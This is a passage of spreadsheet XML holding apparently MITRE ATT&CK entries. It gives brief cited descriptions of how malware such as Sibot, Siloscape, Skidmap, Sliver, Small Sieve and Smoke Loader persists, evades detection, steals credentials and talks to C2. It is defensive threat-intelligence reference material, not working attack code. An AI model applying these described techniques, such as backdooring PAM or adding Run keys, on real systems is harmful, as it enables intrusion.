    <t>[Sibot](https://attack.mitre.org/software/S0589) has downloaded a DLL to the &lt;code&gt;C:\windows\system32\drivers\&lt;/code&gt; folder and renamed it with a &lt;code&gt;.sys&lt;/code&gt; extension.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--3e79db26-a2ce-4233-a86c-5a97b10dd937</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has modified the Registry to install a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--e41eea8b-20d6-4050-96e6-6b59670f6e65</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via MSHTA application.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--acd4b81e-6bef-4ac0-bf4b-2428b5c9c6b9</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has queried the registry for proxy server information.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--03070395-3b76-4351-a3bd-0d9eaaa6652c</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has executed downloaded DLLs with &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--bdb9f6a6-7fe0-47e5-b708-3cb92360f6f9</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has been executed via a scheduled task.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--2496d1c4-cb04-40ab-9f9a-0102da3e6d77</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) checked if the compromised system is configured to use proxies.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--453679cf-e04c-4419-9b94-9a150092a04d</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has retrieved a GUID associated with a present LAN connection on a compromised machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--ca5d71c9-2184-4cb2-9a63-2146fba66175</t>
  </si>
  <si>
    <t xml:space="preserve">[Sibot](https://attack.mitre.org/software/S0589) executes commands using VBScript.(Citation: MSTIC NOBELIUM Mar 2021)	</t>
  </si>
  <si>
    <t>relationship--aa26d89c-7c7d-449a-a26a-caa37573698e</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) communicated with its C2 server via HTTP GET requests.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--fbc77ca5-46b1-4c5b-8e48-d053d1eb238d</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used a legitimate compromised website to download DLLs to the victim's machine.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--9ffd4ba1-1114-4df9-875c-14cacda87b21</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has used WMI to discover network connections and configurations. [Sibot](https://attack.mitre.org/software/S0589) has also used the Win32_Process class to execute a malicious DLL.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--6988baa7-1b48-4203-8020-7bb3fb38098d</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can embed C2 responses in the source code of a fake Flickr webpage.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--f0782cdb-1b7a-4e23-acb4-dba55ad03468</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to upload files from a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--9fb48ae2-125f-48f8-a813-8e64cf70bde3</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can decode and decrypt messages received from C2.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--9dcec42b-174d-4b74-8aab-c5727a71c25c</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has exfiltrated data over its C2 channel.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--ae81a84a-e7a6-4f9d-b412-3f91b012f052</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has primarily used port 443 for C2 but can use port 80 as a fallback.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--abdaccd2-6a3e-4bd2-8fa2-b192f67f22ca</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to search for specific files.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--44a9f8e6-7b16-4c19-a1ac-df57a67b329a</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to download additional files.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--6b47884a-47ac-4f0a-9d5b-3c6eb0efd761</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can use &lt;code&gt;GetUserNameW&lt;/code&gt;, &lt;code&gt;GetComputerNameW&lt;/code&gt;, and &lt;code&gt;GetComputerNameExW&lt;/code&gt; to gather information.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--0b097893-c35a-4e75-ad26-d13ca0fd8b61</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has used Base64 for encoded C2 traffic.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--0b71ce5b-7174-4491-8890-c699d93907e7</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can encrypt C2 communications with a randomly generated key.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--4256a056-d15a-4323-8e04-92e623d5e899</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can collect the computer name of a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--d68f3474-8ba0-45e8-8876-3b1dd8a56fbf</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has the ability to collect the domain name on a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--984047c3-43fc-41ad-8d8c-ea585452bc30</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can collect the username on a targeted system.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--36c4252b-fc24-467e-b56b-56ba29bb4026</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) has used HTTP GET and POST requests over port 443 for C2.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--8c79800f-4f3c-41ad-8d35-7d11c6cd65b3</t>
  </si>
  <si>
    <t>[SideTwist](https://attack.mitre.org/software/S0610) can execute shell commands on a compromised host.(Citation: Check Point APT34 April 2021)</t>
  </si>
  <si>
    <t>relationship--56d8c364-ef22-485c-961f-e3c9782cc6df</t>
  </si>
  <si>
    <t>S0623</t>
  </si>
  <si>
    <t>Siloscape</t>
  </si>
  <si>
    <t>malware--4fbd565b-bf55-4ac7-80b4-b183a7b64b9c</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) connects to an IRC server for C2.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--79fd974c-b51b-45d4-b220-6f532ec6bc63</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) can send kubectl commands to victim clusters through an IRC channel and can run kubectl locally to spread once within a victim cluster.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--bcee03c4-6420-4280-8212-c8aa44a13730</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</si>
  <si>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</si>
  <si>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relationship--95fc8b91-eda2-49e9-b2fb-b3cdfacc0eaa</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of &lt;code&gt;NtSetInformationSymbolicLink&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--6c91f220-34c0-4d9a-8e23-e1a4b29742dc</t>
  </si>
  <si>
    <t xml:space="preserve">[Siloscape](https://attack.mitre.org/software/S0623) is executed after the attacker gains initial access to a Windows container using a known vulnerability.(Citation: Unit 42 Siloscape Jun 2021) </t>
  </si>
  <si>
    <t>relationship--26ecce49-13ab-43a9-a626-10dae30b6961</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) has leveraged a vulnerability in Windows containers to perform an [Escape to Host](https://attack.mitre.org/techniques/T1611).(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--ae5fcb43-0f85-4c96-9b4b-65fe6a19e4fb</t>
  </si>
  <si>
    <t xml:space="preserve"> [Siloscape](https://attack.mitre.org/software/S0623) searches for the Kubernetes config file and other related files using a regular expression.(Citation: Unit 42 Siloscape Jun 2021) </t>
  </si>
  <si>
    <t>relationship--ba0d8cf0-e6a7-4465-b818-d7b71b441919</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) uses Tor to communicate with C2.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--516c98bb-bef8-4f24-ac69-acb3b662a870</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) makes various native API calls.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--f8dbf944-f27b-4829-8781-9314908c9980</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) itself is obfuscated and uses obfuscated API calls.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--bb671992-02f2-430d-9d33-f43fae135735</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) checks for Kubernetes node permissions.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--e869a744-8bc5-4c01-960f-11e850a5c38e</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) searches for the kubectl binary.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--163851e2-5236-41cb-897f-06e33624c3ec</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) impersonates the main thread of &lt;code&gt;CExecSvc.exe&lt;/code&gt; by calling &lt;code&gt;NtImpersonateThread&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--f1c2ca5b-6b10-4604-8c74-588878e7d69c</t>
  </si>
  <si>
    <t>[Siloscape](https://attack.mitre.org/software/S0623) can run cmd through an IRC channel.(Citation: Unit 42 Siloscape Jun 2021)</t>
  </si>
  <si>
    <t>relationship--9a88636a-3ac1-4068-91df-82c51fa97086</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>malware--89f63ae4-f229-4a5c-95ad-6f22ed2b5c49</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</si>
  <si>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</si>
  <si>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relationship--f76355cb-9aa5-403c-aae4-8faed799ac31</t>
  </si>
  <si>
    <t>S0468</t>
  </si>
  <si>
    <t>Skidmap</t>
  </si>
  <si>
    <t>malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has installed itself via crontab.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--40f49d74-4d0f-467a-be79-cd57559d8230</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>relationship--952412b3-a7b1-402c-a92e-96830df4d14b</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to set SELinux to permissive mode.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--f474fc4e-8fd4-4c67-b55c-23c67807a94f</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</si>
  <si>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</si>
  <si>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relationship--472c61e4-e839-4766-b1ce-d9095203e538</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>relationship--1eb0fe9c-86e9-4c8c-8a24-c7b139559971</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to install several loadable kernel modules (LKMs) on infected machines.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--513128aa-573e-4185-b0dc-88738edacb65</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has created a fake &lt;code&gt;rm&lt;/code&gt; binary to replace the legitimate Linux binary.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--30c69dcc-9cf7-4352-a30c-0e7bc86b38e7</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>relationship--2329d963-f01b-46bd-8868-99cf436a508a</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--61cfe134-e24e-490e-a298-40612df42832</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>relationship--8ca0a20d-2c12-4b68-a2a9-ebd95c05ee68</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--0bb4fb8a-0b0f-46c6-820b-d46c5f98fa12</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</si>
  <si>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</si>
  <si>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relationship--759185fe-d576-43f5-afac-acd653e5fcf4</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--13d595d2-9497-4bbe-be74-6e2a3a4dde06</t>
  </si>
  <si>
    <t xml:space="preserve">[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if &lt;code&gt;/usr/sbin/setenforce&lt;/code&gt; exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) </t>
  </si>
  <si>
    <t>relationship--49f761f9-89d2-4e6f-a0c6-fc5e32cca471</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--709d0737-e2ac-4ce3-9772-0dbc06f9667e</t>
  </si>
  <si>
    <t>[Skidmap](https://attack.mitre.org/software/S0468) has used &lt;code&gt;pm.sh&lt;/code&gt; to download and install its main payload.(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>relationship--b3bcdaeb-e4d7-403d-902e-df55aa5b6bb9</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) has the ability to manipulate user tokens on targeted Windows systems.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>relationship--5a25798a-eca1-4841-b422-95aa3bf025e3</t>
  </si>
  <si>
    <t>16 September 2021</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use mutual TLS and RSA  cryptography to exchange a session key.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver Encryption)</t>
  </si>
  <si>
    <t>relationship--7c593b6a-6426-4d8e-b98b-db02d1ec1025</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can support C2 communications over DNS.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2 DNS)</t>
  </si>
  <si>
    <t>relationship--73ddd025-b313-49cc-8a28-4c3869eb5a16</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can exfiltrate files from the victim using the &lt;code&gt;download&lt;/code&gt; command.(Citation: GitHub Sliver Download)</t>
  </si>
  <si>
    <t>relationship--c6f2fa29-30fd-45c1-8adf-ed621771bd5d</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can enumerate files on a target system.(Citation: GitHub Sliver File System August 2021)</t>
  </si>
  <si>
    <t>relationship--23149a27-cccf-4fb4-bc35-fc4ebf4c6664</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can upload files from the C2 server to the victim machine using the &lt;code&gt;upload&lt;/code&gt; command.(Citation: GitHub Sliver Upload)</t>
  </si>
  <si>
    <t>relationship--94ea901d-3904-4d84-9b0f-7df943683cd7</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can encrypt strings at compile time.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>relationship--7ada6af2-f97d-4a64-8eca-9fffba657d46</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can inject code into local and remote processes.(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>relationship--223a75cd-eb8f-4477-b4c3-e2a4e651d875</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can take screenshots of the victim’s active display.(Citation: GitHub Sliver Screen)</t>
  </si>
  <si>
    <t>relationship--8bcc4714-800c-4d13-8b85-2bdf107f5fb4</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use standard encoding techniques like gzip and hex to ASCII to encode the C2 communication payload.(Citation: GitHub Sliver HTTP)</t>
  </si>
  <si>
    <t>relationship--df2a0a3b-1a23-4148-a0f7-ed5b45a0d095</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can encode binary data into a .PNG file for C2 communication.(Citation: GitHub Sliver HTTP)</t>
  </si>
  <si>
    <t>relationship--41b7f3d7-b42e-4301-ac9e-ecad27e826a0</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can use AES-GCM-256 to encrypt a session key for C2 message exchange.(Citation: GitHub Sliver Encryption)</t>
  </si>
  <si>
    <t>relationship--b85998e0-9f93-4cb3-a1cf-64e510b109c4</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) has the ability to gather network configuration information.(Citation: GitHub Sliver Ifconfig)</t>
  </si>
  <si>
    <t>relationship--8babd998-d5ca-43b4-9a68-a20d5b84cf61</t>
  </si>
  <si>
    <t>[Sliver](https://attack.mitre.org/software/S0633) can collect network connection information.(Citation: GitHub Sliver Netstat)</t>
  </si>
  <si>
    <t>relationship--fcd35640-6e11-4562-a28b-7439ba8ec6f2</t>
  </si>
  <si>
    <t xml:space="preserve"> [Sliver](https://attack.mitre.org/software/S0633) has the ability to support C2 communications over HTTP/S.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2)</t>
  </si>
  <si>
    <t>relationship--8ed083f5-5fb2-4dbe-bb59-0a77b63e4a18</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--6e83dba5-a1ea-4a65-bc14-541bd89955a7</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--dd7f2e12-d646-4a89-9ba6-4f20e88fb7db</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can only execute correctly if the word `Platypus` is passed to it on the command line.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--3790f831-7228-4de1-9272-3d304dd7328c</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to download files.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--2ffd84e6-b76d-4c0c-9c76-ef8e55446546</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use variations of Microsoft and Outlook spellings, such as "Microsift", in its file names to avoid detection.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--71fcb2f2-85d0-4d59-8d6e-8b5a1ccb7d29</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--361df799-64ee-405f-bd31-788ecc5c8d45</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--7dfc877a-4563-4c7f-91e0-b5f5adfcb873</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use Python scripts to execute commands.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--6f94bd08-b5cb-4e6e-ae10-f858a2e55e28</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) has the ability to add itself to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift` for persistence.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--70613a9f-e8c2-44ba-a238-34acb0b7e5b8</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can obtain the IP address of a victim host.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--66d0e438-b9d5-4532-812f-3b1a30702fce</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can obtain the id of a logged in user.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--82927a23-3e5e-4892-b788-c35cc6e649a5</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can contact actor-controlled C2 servers by using the Telegram API over HTTPS.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--e1684251-e7a6-462b-891e-62a1290152af</t>
  </si>
  <si>
    <t>[Small Sieve](https://attack.mitre.org/software/S1035) can use `cmd.exe` to execute commands on a victim's system.(Citation: NCSC GCHQ Small Sieve Jan 2022)</t>
  </si>
  <si>
    <t>relationship--1fe26342-5bd2-4f5b-91a8-e9b6c53f7c23</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>malware--0c824410-58ff-49b2-9cf2-1c96b182bdf0</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for files named logins.json to parse for credentials.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--0e5b4489-d480-4f42-aadb-0eeb45ad6bc0</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches for credentials stored from web browsers.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--44aeb943-8861-4018-a93b-beeb393bfa8f</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) deobfuscates its code.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--0c4af99b-e82d-422f-86da-ccc94e55d763</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) recursively searches through directories for files.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--f7484ee2-6d98-4f5b-8788-2cf1675b349d</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) downloads a new version of itself once it has installed. It also downloads additional plugins.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>relationship--4bb79228-9531-47c0-8e73-401e741593a8</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--25d65c10-5fa3-40c1-9e25-936894446178</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses a simple one-byte XOR method to obfuscate values in the malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--8e809969-d903-4e58-b8a9-7344127da3cd</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.(Citation: Malwarebytes SmokeLoader 2016)(Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>relationship--72cf04c6-5e0b-4743-9386-88f1f1f45899</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) injects into the Internet Explorer process.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--95ed1db5-c388-4b1b-9824-9703b248f798</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>relationship--51cc7dff-7fb4-41bc-a67d-39598f14f1d8</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) launches a scheduled task.(Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--f3c37734-1f69-44ee-9e27-480ba68c79f4</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) scans processes to perform anti-VM checks. (Citation: Talos Smoke Loader July 2018)</t>
  </si>
  <si>
    <t>relationship--4929677b-3ce9-4065-9837-cfaa0cad8c89</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Visual Basic script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>relationship--4287de65-be1d-44aa-9c50-9c391e321597</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) uses HTTP for C2.(Citation: Malwarebytes SmokeLoader 2016)</t>
  </si>
  <si>
    <t>relationship--46829b2b-0f05-4022-a254-e8b26fdfb860</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can obfuscate strings using junk Chinese characters.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--f54d4ca7-940d-4cf2-b02d-df9b5bfb643e</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can decode its second-stage PowerShell script prior to execution.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--03e6a535-5c95-47e7-a369-aed653022c7c</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) has been delivered to targets via downloads from malicious domains.(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--c7b780c4-7a9a-4eb2-9132-6c80a8671a94</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can execute PowerShell scripts in a hidden window.(Citation: Morphisec Snip3 May 2021)</t>
  </si>
  <si>
    <t>relationship--e8ab5495-dbc7-470a-b3e7-cbbfbf29094e</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can download additional payloads to compromised systems.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--992be3b6-caea-497f-ae2b-256197433cc8</t>
  </si>
  <si>
    <t>[Snip3](https://attack.mitre.org/software/S1086) can gain execution through the download of visual basic files.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)</t>
  </si>
  <si>
    <t>relationship--69d1d811-fb2f-43cc-99bb-989769dd4ffb</t>
  </si>
  <si>
